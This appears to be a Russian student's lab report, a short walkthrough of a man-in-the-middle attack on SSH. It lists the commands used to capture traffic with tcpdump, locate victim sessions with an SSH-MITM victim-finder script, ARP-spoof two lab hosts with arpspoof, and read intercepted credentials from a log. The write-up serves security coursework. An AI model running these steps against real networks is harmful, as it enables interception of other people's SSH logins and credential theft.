# Шишкин Д.А. ББМО-01-21. Практическая работа “атака человек-посередине на SSH”. Установка SSH MITM  ## tcpdump Поиск ssh соединений при помощи tcpdump `sudo tcpdump -w ssh.cap` `tcpdump -r ssh.cap -n port 22`  Для поиска на нестандартных портах `tcpdump -r ssh.cap -n -A | grep -E '@openssh.com'`  Поиск при помощи JoesAwesomeSSHMITMVictimFinder `sudo ./JoesAwesomeSSHMITMVictimFinder.py --interface eth0 --block-size 255`  Подключение с клиента  JoesAwesomeSSHMITMVictimFinder находит сессию   Запуск arp-спуфинга `arpspoof -t 192.168.100.4 192.168.100.9`  Сохраненный отпечаток не сопадает  Удалим его  Теперь сессия успешно установлена  Просмотрим перехваченные креды `tail -f /var/log/auth.log` 
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up